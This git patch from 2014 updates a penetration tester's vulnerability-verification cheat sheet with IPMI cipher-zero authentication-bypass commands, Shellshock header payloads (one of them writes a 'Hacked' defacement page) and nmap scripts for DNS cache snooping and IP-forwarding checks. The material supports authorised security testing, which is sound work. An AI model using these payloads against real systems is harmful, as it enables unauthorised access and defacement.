From e36468409d32e349d5bd05335610913419a31955 Mon Sep 17 00:00:00 2001 From: JShaw Date: Thu, 9 Oct 2014 16:27:10 +0100 Subject: [PATCH] Updates Updates --- Cheatsheet_VulnVerify.txt | 31 ++++++++++++++++++++++++++++++- 1 file changed, 30 insertions(+), 1 deletion(-) diff --git a/Cheatsheet_VulnVerify.txt b/Cheatsheet_VulnVerify.txt index dd83311..fc8c922 100644 --- a/Cheatsheet_VulnVerify.txt +++ b/Cheatsheet_VulnVerify.txt @@ -1,4 +1,4 @@ -Verify various vulnerabilities +Verify Various Vulnerabilities ------------------------------ [+] IPMI Cipher Suite Zero Authentication Bypass: @@ -16,3 +16,32 @@ ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor + + +[+] Bash Remote Code Execution (Shellshock) +http://www.tenable.com/plugins/index.php?view=single&id=77823 + +x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt +x: () { :;}; echo "Hacked" > /var/www/hacked.html + + +[+] DNS Server Cache Snooping Remote Information Disclosure +http://www.tenable.com/plugins/index.php?view=single&id=12217 + +Nmap Script: dns-cache-snoop +http://nmap.org/nsedoc/scripts/dns-cache-snoop.html + +nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' + + +[+] IP Forwarding Enabled +http://www.tenable.com/plugins/index.php?view=single&id=50686 + +Nmap Script: ip-forwarding +http://nmap.org/nsedoc/scripts/ip-forwarding.html + +sudo nmap -sn --script ip-forwarding --script-args='target=www.example.com' + +Alternatives: +- Set VM's default gateway as the victim IP address and attempt to route elsewhere. +- http://pentestmonkey.net/tools/gateway-finder